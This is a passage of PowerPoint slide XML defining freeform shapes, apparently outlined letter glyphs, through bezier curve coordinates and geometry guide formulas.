                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24003" y="91821"/>
                      <a:pt x="18669" y="88392"/>
                      <a:pt x="14192" y="83915"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9715" y="79534"/>
                      <a:pt x="6286" y="74390"/>
                      <a:pt x="3715" y="68390"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1238" y="62484"/>
                      <a:pt x="0" y="56102"/>
                      <a:pt x="0" y="49530"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="49149"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="42386"/>
                      <a:pt x="1238" y="36004"/>
                      <a:pt x="3810" y="30099"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6382" y="24194"/>
                      <a:pt x="9906" y="18955"/>
                      <a:pt x="14288" y="14478"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18764" y="10001"/>
                      <a:pt x="24003" y="6477"/>
                      <a:pt x="30194" y="3905"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36290" y="1333"/>
                      <a:pt x="42958" y="0"/>
                      <a:pt x="50292" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57626" y="0"/>
                      <a:pt x="64198" y="1238"/>
                      <a:pt x="70390" y="3810"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76486" y="6382"/>
                      <a:pt x="81820" y="9906"/>
                      <a:pt x="86296" y="14288"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90773" y="18764"/>
                      <a:pt x="94202" y="23908"/>
                      <a:pt x="96774" y="29813"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99346" y="35719"/>
                      <a:pt x="100489" y="42005"/>
                      <a:pt x="100489" y="48768"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="100489" y="49149"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100489" y="55816"/>
                      <a:pt x="99250" y="62103"/>
                      <a:pt x="96679" y="68008"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94107" y="73914"/>
                      <a:pt x="90583" y="79153"/>
                      <a:pt x="86201" y="83629"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81724" y="88106"/>
                      <a:pt x="76390" y="91630"/>
                      <a:pt x="70199" y="94202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64008" y="96774"/>
                      <a:pt x="57245" y="98203"/>
                      <a:pt x="50006" y="98203"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="50387" y="79534"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="54769" y="79534"/>
                      <a:pt x="58674" y="78772"/>
                      <a:pt x="62198" y="77153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65722" y="75533"/>
                      <a:pt x="68675" y="73342"/>
                      <a:pt x="71152" y="70676"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73628" y="68008"/>
                      <a:pt x="75533" y="64770"/>
                      <a:pt x="76867" y="61151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78200" y="57531"/>
                      <a:pt x="78867" y="53721"/>
                      <a:pt x="78867" y="49625"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="78867" y="49244"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="78867" y="45053"/>
                      <a:pt x="78200" y="41148"/>
                      <a:pt x="76771" y="37433"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75343" y="33719"/>
                      <a:pt x="73342" y="30575"/>
                      <a:pt x="70866" y="27813"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68294" y="25051"/>
                      <a:pt x="65342" y="22955"/>
                      <a:pt x="61817" y="21336"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58293" y="19717"/>
                      <a:pt x="54483" y="18955"/>
                      <a:pt x="50197" y="18955"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45910" y="18955"/>
                      <a:pt x="42100" y="19717"/>
                      <a:pt x="38576" y="21336"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35052" y="22955"/>
                      <a:pt x="32099" y="25051"/>
                      <a:pt x="29623" y="27718"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27146" y="30385"/>
                      <a:pt x="25241" y="33528"/>
                      <a:pt x="23908" y="37243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22574" y="40957"/>
                      <a:pt x="22003" y="44768"/>
                      <a:pt x="22003" y="48863"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="22003" y="49244"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="22003" y="53435"/>
                      <a:pt x="22669" y="57341"/>
                      <a:pt x="24098" y="60960"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25527" y="64579"/>
                      <a:pt x="27527" y="67818"/>
                      <a:pt x="30004" y="70580"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32575" y="73342"/>
                      <a:pt x="35528" y="75533"/>
                      <a:pt x="39052" y="77153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42481" y="78677"/>
                      <a:pt x="46292" y="79534"/>
                      <a:pt x="50387" y="79534"/>
                    </a:cubicBez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0" name="자유형: 도형 99">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D777A68F-D7CA-1A45-B2CD-655F8F0EB5A1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3553880" y="3966679"/>
                <a:ext cx="142875" cy="95250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 0 w 142875"/>
                  <a:gd name="connsiteY0" fmla="*/ 2000 h 95250"/>
                  <a:gd name="connsiteX1" fmla="*/ 21717 w 142875"/>
                  <a:gd name="connsiteY1" fmla="*/ 2000 h 95250"/>
                  <a:gd name="connsiteX2" fmla="*/ 21717 w 142875"/>
                  <a:gd name="connsiteY2" fmla="*/ 16383 h 95250"/>
                  <a:gd name="connsiteX3" fmla="*/ 26670 w 142875"/>
                  <a:gd name="connsiteY3" fmla="*/ 10287 h 95250"/>
                  <a:gd name="connsiteX4" fmla="*/ 32766 w 142875"/>
                  <a:gd name="connsiteY4" fmla="*/ 5048 h 95250"/>
                  <a:gd name="connsiteX5" fmla="*/ 40577 w 142875"/>
                  <a:gd name="connsiteY5" fmla="*/ 1333 h 95250"/>
                  <a:gd name="connsiteX6" fmla="*/ 50292 w 142875"/>
                  <a:gd name="connsiteY6" fmla="*/ 0 h 95250"/>
                  <a:gd name="connsiteX7" fmla="*/ 67437 w 142875"/>
                  <a:gd name="connsiteY7" fmla="*/ 4572 h 95250"/>
                  <a:gd name="connsiteX8" fmla="*/ 78200 w 142875"/>
                  <a:gd name="connsiteY8" fmla="*/ 16669 h 95250"/>
                  <a:gd name="connsiteX9" fmla="*/ 91726 w 142875"/>
                  <a:gd name="connsiteY9" fmla="*/ 4572 h 95250"/>
                  <a:gd name="connsiteX10" fmla="*/ 110204 w 142875"/>
                  <a:gd name="connsiteY10" fmla="*/ 0 h 95250"/>
                  <a:gd name="connsiteX11" fmla="*/ 134493 w 142875"/>
                  <a:gd name="connsiteY11" fmla="*/ 9334 h 95250"/>
                  <a:gd name="connsiteX12" fmla="*/ 143256 w 142875"/>
                  <a:gd name="connsiteY12" fmla="*/ 36004 h 95250"/>
                  <a:gd name="connsiteX13" fmla="*/ 143256 w 142875"/>
                  <a:gd name="connsiteY13" fmla="*/ 96107 h 95250"/>
                  <a:gd name="connsiteX14" fmla="*/ 121539 w 142875"/>
                  <a:gd name="connsiteY14" fmla="*/ 96107 h 95250"/>
                  <a:gd name="connsiteX15" fmla="*/ 121539 w 142875"/>
                  <a:gd name="connsiteY15" fmla="*/ 42767 h 95250"/>
                  <a:gd name="connsiteX16" fmla="*/ 116586 w 142875"/>
                  <a:gd name="connsiteY16" fmla="*/ 25717 h 95250"/>
                  <a:gd name="connsiteX17" fmla="*/ 102584 w 142875"/>
                  <a:gd name="connsiteY17" fmla="*/ 19812 h 95250"/>
                  <a:gd name="connsiteX18" fmla="*/ 88106 w 142875"/>
                  <a:gd name="connsiteY18" fmla="*/ 25813 h 95250"/>
                  <a:gd name="connsiteX19" fmla="*/ 82486 w 142875"/>
                  <a:gd name="connsiteY19" fmla="*/ 43148 h 95250"/>
                  <a:gd name="connsiteX20" fmla="*/ 82486 w 142875"/>
                  <a:gd name="connsiteY20" fmla="*/ 96203 h 95250"/>
                  <a:gd name="connsiteX21" fmla="*/ 60769 w 142875"/>
                  <a:gd name="connsiteY21" fmla="*/ 96203 h 95250"/>
                  <a:gd name="connsiteX22" fmla="*/ 60769 w 142875"/>
                  <a:gd name="connsiteY22" fmla="*/ 42672 h 95250"/>
                  <a:gd name="connsiteX23" fmla="*/ 55817 w 142875"/>
                  <a:gd name="connsiteY23" fmla="*/ 25813 h 95250"/>
                  <a:gd name="connsiteX24" fmla="*/ 41815 w 142875"/>
                  <a:gd name="connsiteY24" fmla="*/ 19907 h 95250"/>
                  <a:gd name="connsiteX25" fmla="*/ 27242 w 142875"/>
                  <a:gd name="connsiteY25" fmla="*/ 26098 h 95250"/>
                  <a:gd name="connsiteX26" fmla="*/ 21717 w 142875"/>
                  <a:gd name="connsiteY26" fmla="*/ 43339 h 95250"/>
                  <a:gd name="connsiteX27" fmla="*/ 21717 w 142875"/>
                  <a:gd name="connsiteY27" fmla="*/ 96203 h 95250"/>
                  <a:gd name="connsiteX28" fmla="*/ 0 w 142875"/>
                  <a:gd name="connsiteY28" fmla="*/ 96203 h 95250"/>
                  <a:gd name="connsiteX29" fmla="*/ 0 w 142875"/>
                  <a:gd name="connsiteY29" fmla="*/ 200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875" h="95250">
                    <a:moveTo>
                      <a:pt x="0" y="2000"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="21717" y="2000"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21717" y="16383"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="23241" y="14192"/>
                      <a:pt x="24956" y="12192"/>
                      <a:pt x="26670" y="10287"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="28480" y="8382"/>
                      <a:pt x="30480" y="6667"/>
                      <a:pt x="32766" y="5048"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35052" y="3524"/>
                      <a:pt x="37719" y="2286"/>
                      <a:pt x="40577" y="1333"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43434" y="476"/>
                      <a:pt x="46673" y="0"/>
                      <a:pt x="50292" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57055" y="0"/>
                      <a:pt x="62770" y="1524"/>
                      <a:pt x="67437" y="4572"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="72104" y="7620"/>
                      <a:pt x="75724" y="11716"/>
                      <a:pt x="78200" y="16669"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="82010" y="11621"/>
                      <a:pt x="86487" y="7620"/>
                      <a:pt x="91726" y="4572"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96965" y="1524"/>
                      <a:pt x="103061" y="0"/>
                      <a:pt x="110204" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120586" y="0"/>
                      <a:pt x="128683" y="3143"/>
                      <a:pt x="134493" y="9334"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140303" y="15621"/>
                      <a:pt x="143256" y="24479"/>
                      <a:pt x="143256" y="36004"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="143256" y="96107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121539" y="96107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121539" y="42767"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="121539" y="35338"/>
                      <a:pt x="119920" y="29623"/>
                      <a:pt x="116586" y="25717"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="113252" y="21812"/>
                      <a:pt x="108585" y="19812"/>
                      <a:pt x="102584" y="19812"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="96679" y="19812"/>
                      <a:pt x="91821" y="21812"/>
                      <a:pt x="88106" y="25813"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="84391" y="29813"/>
                      <a:pt x="82486" y="35528"/>
                      <a:pt x="82486" y="43148"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="82486" y="96203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60769" y="96203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="60769" y="42672"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="60769" y="35338"/>
                      <a:pt x="59150" y="29718"/>
                      <a:pt x="55817" y="25813"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="52483" y="21908"/>
                      <a:pt x="47815" y="19907"/>
                      <a:pt x="41815" y="19907"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35814" y="19907"/>
                      <a:pt x="30956" y="22003"/>
                      <a:pt x="27242" y="26098"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23527" y="30290"/>
                      <a:pt x="21717" y="36004"/>
                      <a:pt x="21717" y="43339"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21717" y="96203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="96203"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="2000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1" name="자유형: 도형 100">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{231E92E6-6A9D-FD43-83A5-BB9598BCB075}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3718091" y="3966774"/>
                <a:ext cx="95250" cy="95250"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 50006 w 95250"/>
                  <a:gd name="connsiteY0" fmla="*/ 98203 h 95250"/>
                  <a:gd name="connsiteX1" fmla="*/ 30099 w 95250"/>
                  <a:gd name="connsiteY1" fmla="*/ 94393 h 95250"/>
                  <a:gd name="connsiteX2" fmla="*/ 14192 w 95250"/>
                  <a:gd name="connsiteY2" fmla="*/ 83915 h 95250"/>
                  <a:gd name="connsiteX3" fmla="*/ 3715 w 95250"/>
                  <a:gd name="connsiteY3" fmla="*/ 68390 h 95250"/>
                  <a:gd name="connsiteX4" fmla="*/ 0 w 95250"/>
                  <a:gd name="connsiteY4" fmla="*/ 49530 h 95250"/>
                  <a:gd name="connsiteX5" fmla="*/ 0 w 95250"/>
                  <a:gd name="connsiteY5" fmla="*/ 49149 h 95250"/>
                  <a:gd name="connsiteX6" fmla="*/ 3810 w 95250"/>
                  <a:gd name="connsiteY6" fmla="*/ 30099 h 95250"/>
                  <a:gd name="connsiteX7" fmla="*/ 14288 w 95250"/>
                  <a:gd name="connsiteY7" fmla="*/ 14478 h 95250"/>
                  <a:gd name="connsiteX8" fmla="*/ 30194 w 95250"/>
                  <a:gd name="connsiteY8" fmla="*/ 3905 h 95250"/>
                  <a:gd name="connsiteX9" fmla="*/ 50292 w 95250"/>
                  <a:gd name="connsiteY9" fmla="*/ 0 h 95250"/>
                  <a:gd name="connsiteX10" fmla="*/ 70390 w 95250"/>
                  <a:gd name="connsiteY10" fmla="*/ 3810 h 95250"/>
                  <a:gd name="connsiteX11" fmla="*/ 86296 w 95250"/>
                  <a:gd name="connsiteY11" fmla="*/ 14288 h 95250"/>
                  <a:gd name="connsiteX12" fmla="*/ 96774 w 95250"/>
                  <a:gd name="connsiteY12" fmla="*/ 29813 h 95250"/>
                  <a:gd name="connsiteX13" fmla="*/ 100489 w 95250"/>
                  <a:gd name="connsiteY13" fmla="*/ 48768 h 95250"/>
                  <a:gd name="connsiteX14" fmla="*/ 100489 w 95250"/>
                  <a:gd name="connsiteY14" fmla="*/ 49149 h 95250"/>
                  <a:gd name="connsiteX15" fmla="*/ 96679 w 95250"/>
                  <a:gd name="connsiteY15" fmla="*/ 68008 h 95250"/>
                  <a:gd name="connsiteX16" fmla="*/ 86201 w 95250"/>
                  <a:gd name="connsiteY16" fmla="*/ 83629 h 95250"/>
                  <a:gd name="connsiteX17" fmla="*/ 70199 w 95250"/>
                  <a:gd name="connsiteY17" fmla="*/ 94202 h 95250"/>
                  <a:gd name="connsiteX18" fmla="*/ 50006 w 95250"/>
                  <a:gd name="connsiteY18" fmla="*/ 98203 h 95250"/>
                  <a:gd name="connsiteX19" fmla="*/ 50292 w 95250"/>
                  <a:gd name="connsiteY19" fmla="*/ 79534 h 95250"/>
                  <a:gd name="connsiteX20" fmla="*/ 62103 w 95250"/>
                  <a:gd name="connsiteY20" fmla="*/ 77153 h 95250"/>
                  <a:gd name="connsiteX21" fmla="*/ 71057 w 95250"/>
                  <a:gd name="connsiteY21" fmla="*/ 70676 h 95250"/>
                  <a:gd name="connsiteX22" fmla="*/ 76771 w 95250"/>
                  <a:gd name="connsiteY22" fmla="*/ 61151 h 95250"/>
                  <a:gd name="connsiteX23" fmla="*/ 78772 w 95250"/>
                  <a:gd name="connsiteY23" fmla="*/ 49625 h 95250"/>
                  <a:gd name="connsiteX24" fmla="*/ 78772 w 95250"/>
                  <a:gd name="connsiteY24" fmla="*/ 49244 h 95250"/>
                  <a:gd name="connsiteX25" fmla="*/ 76676 w 95250"/>
                  <a:gd name="connsiteY25" fmla="*/ 37433 h 95250"/>
                  <a:gd name="connsiteX26" fmla="*/ 70771 w 95250"/>
                  <a:gd name="connsiteY26" fmla="*/ 27813 h 95250"/>
                  <a:gd name="connsiteX27" fmla="*/ 61722 w 95250"/>
                  <a:gd name="connsiteY27" fmla="*/ 21336 h 95250"/>
                  <a:gd name="connsiteX28" fmla="*/ 50101 w 95250"/>
                  <a:gd name="connsiteY28" fmla="*/ 18955 h 95250"/>
                  <a:gd name="connsiteX29" fmla="*/ 38481 w 95250"/>
                  <a:gd name="connsiteY29" fmla="*/ 21336 h 95250"/>
                  <a:gd name="connsiteX30" fmla="*/ 29528 w 95250"/>
                  <a:gd name="connsiteY30" fmla="*/ 27718 h 95250"/>
                  <a:gd name="connsiteX31" fmla="*/ 23813 w 95250"/>
                  <a:gd name="connsiteY31" fmla="*/ 37243 h 95250"/>
                  <a:gd name="connsiteX32" fmla="*/ 21908 w 95250"/>
                  <a:gd name="connsiteY32" fmla="*/ 48863 h 95250"/>
                  <a:gd name="connsiteX33" fmla="*/ 21908 w 95250"/>
                  <a:gd name="connsiteY33" fmla="*/ 49244 h 95250"/>
                  <a:gd name="connsiteX34" fmla="*/ 24003 w 95250"/>
                  <a:gd name="connsiteY34" fmla="*/ 60960 h 95250"/>
                  <a:gd name="connsiteX35" fmla="*/ 29908 w 95250"/>
                  <a:gd name="connsiteY35" fmla="*/ 70580 h 95250"/>
                  <a:gd name="connsiteX36" fmla="*/ 38957 w 95250"/>
                  <a:gd name="connsiteY36" fmla="*/ 77153 h 95250"/>
                  <a:gd name="connsiteX37" fmla="*/ 50292 w 95250"/>
                  <a:gd name="connsiteY37" fmla="*/ 79534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5250" h="95250">
                    <a:moveTo>
                      <a:pt x="50006" y="98203"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="42863" y="98203"/>
                      <a:pt x="36290" y="96965"/>
                      <a:pt x="30099" y="94393"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="24003" y="91821"/>
                      <a:pt x="18669" y="88392"/>
                      <a:pt x="14192" y="83915"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9716" y="79534"/>
                      <a:pt x="6287" y="74390"/>
                      <a:pt x="3715" y="68390"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1238" y="62484"/>
                      <a:pt x="0" y="56102"/>
                      <a:pt x="0" y="49530"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="0" y="49149"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="42386"/>
                      <a:pt x="1238" y="36004"/>
                      <a:pt x="3810" y="30099"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6382" y="24194"/>
                      <a:pt x="9906" y="18955"/>
                      <a:pt x="14288" y="14478"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18764" y="10001"/>
                      <a:pt x="24003" y="6477"/>
                      <a:pt x="30194" y="3905"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="36290" y="1333"/>
                      <a:pt x="42958" y="0"/>
                      <a:pt x="50292" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="57626" y="0"/>
                      <a:pt x="64199" y="1238"/>
                      <a:pt x="70390" y="3810"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="76486" y="6382"/>
                      <a:pt x="81820" y="9906"/>
                      <a:pt x="86296" y="14288"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90773" y="18764"/>
                      <a:pt x="94202" y="23908"/>
                      <a:pt x="96774" y="29813"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="99346" y="35719"/>
                      <a:pt x="100489" y="42005"/>
                      <a:pt x="100489" y="48768"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="100489" y="49149"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100489" y="55816"/>
                      <a:pt x="99250" y="62103"/>
                      <a:pt x="96679" y="68008"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="94107" y="73914"/>
                      <a:pt x="90583" y="79153"/>
                      <a:pt x="86201" y="83629"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="81725" y="88106"/>
                      <a:pt x="76391" y="91630"/>
                      <a:pt x="70199" y="94202"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="64008" y="96774"/>
                      <a:pt x="57245" y="98203"/>
                      <a:pt x="50006" y="98203"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="50292" y="79534"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="54674" y="79534"/>
                      <a:pt x="58579" y="78772"/>
                      <a:pt x="62103" y="77153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="65627" y="75533"/>
                      <a:pt x="68580" y="73342"/>
                      <a:pt x="71057" y="70676"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73533" y="68008"/>
                      <a:pt x="75438" y="64770"/>
                      <a:pt x="76771" y="61151"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="78105" y="57531"/>
                      <a:pt x="78772" y="53721"/>
                      <a:pt x="78772" y="49625"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="78772" y="49244"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="78772" y="45053"/>
                      <a:pt x="78105" y="41148"/>
                      <a:pt x="76676" y="37433"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="75247" y="33719"/>
                      <a:pt x="73247" y="30575"/>
                      <a:pt x="70771" y="27813"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="68199" y="25051"/>
                      <a:pt x="65246" y="22955"/>
                      <a:pt x="61722" y="21336"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58198" y="19717"/>
                      <a:pt x="54388" y="18955"/>
                      <a:pt x="50101" y="18955"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="45815" y="18955"/>
                      <a:pt x="42005" y="19717"/>
                      <a:pt x="38481" y="21336"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34957" y="22955"/>
                      <a:pt x="32004" y="25051"/>
                      <a:pt x="29528" y="27718"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="27051" y="30385"/>
                      <a:pt x="25146" y="33528"/>
                      <a:pt x="23813" y="37243"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="22479" y="40957"/>
                      <a:pt x="21908" y="44768"/>
                      <a:pt x="21908" y="48863"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="21908" y="49244"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21908" y="53435"/>
                      <a:pt x="22574" y="57341"/>
                      <a:pt x="24003" y="60960"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="25432" y="64579"/>
                      <a:pt x="27432" y="67818"/>
                      <a:pt x="29908" y="70580"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="32480" y="73342"/>
                      <a:pt x="35433" y="75533"/>
                      <a:pt x="38957" y="77153"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="42386" y="78677"/>
                      <a:pt x="46196" y="79534"/>
                      <a:pt x="50292" y="79534"/>
                    </a:cubicBez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2" name="자유형: 도형 101">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2C4D112B-82D5-FC45-9B55-5089800D980F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3832963" y="3942866"/>
                <a:ext cx="57150" cy="114300"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="connsiteX0" fmla="*/ 39243 w 57150"/>
                  <a:gd name="connsiteY0" fmla="*/ 121634 h 114300"/>
                  <a:gd name="connsiteX1" fmla="*/ 28289 w 57150"/>
                  <a:gd name="connsiteY1" fmla="*/ 120205 h 114300"/>
                  <a:gd name="connsiteX2" fmla="*/ 19526 w 57150"/>
                  <a:gd name="connsiteY2" fmla="*/ 115538 h 114300"/>
                  <a:gd name="connsiteX3" fmla="*/ 13907 w 57150"/>
                  <a:gd name="connsiteY3" fmla="*/ 107061 h 114300"/>
                  <a:gd name="connsiteX4" fmla="*/ 11906 w 57150"/>
                  <a:gd name="connsiteY4" fmla="*/ 93917 h 114300"/>
                  <a:gd name="connsiteX5" fmla="*/ 11906 w 57150"/>
                  <a:gd name="connsiteY5" fmla="*/ 44387 h 114300"/>
                  <a:gd name="connsiteX6" fmla="*/ 0 w 57150"/>
                  <a:gd name="connsiteY6" fmla="*/ 44387 h 114300"/>
                  <a:gd name="connsiteX7" fmla="*/ 0 w 57150"/>
                  <a:gd name="connsiteY7" fmla="*/ 25813 h 114300"/>
                  <a:gd name="connsiteX8" fmla="*/ 11906 w 57150"/>
                  <a:gd name="connsiteY8" fmla="*/ 25813 h 114300"/>
                  <a:gd name="connsiteX9" fmla="*/ 11906 w 57150"/>
                  <a:gd name="connsiteY9" fmla="*/ 0 h 114300"/>
                  <a:gd name="connsiteX10" fmla="*/ 33623 w 57150"/>
                  <a:gd name="connsiteY10" fmla="*/ 0 h 114300"/>
                  <a:gd name="connsiteX11" fmla="*/ 33623 w 57150"/>
                  <a:gd name="connsiteY11" fmla="*/ 25813 h 114300"/>
                  <a:gd name="connsiteX12" fmla="*/ 58960 w 57150"/>
                  <a:gd name="connsiteY12" fmla="*/ 25813 h 114300"/>
                  <a:gd name="connsiteX13" fmla="*/ 58960 w 57150"/>
                  <a:gd name="connsiteY13" fmla="*/ 44387 h 114300"/>
                  <a:gd name="connsiteX14" fmla="*/ 33623 w 57150"/>
                  <a:gd name="connsiteY14" fmla="*/ 44387 h 114300"/>
                  <a:gd name="connsiteX15" fmla="*/ 33623 w 57150"/>
                  <a:gd name="connsiteY15" fmla="*/ 90583 h 114300"/>
                  <a:gd name="connsiteX16" fmla="*/ 36671 w 57150"/>
                  <a:gd name="connsiteY16" fmla="*/ 99631 h 114300"/>
                  <a:gd name="connsiteX17" fmla="*/ 45244 w 57150"/>
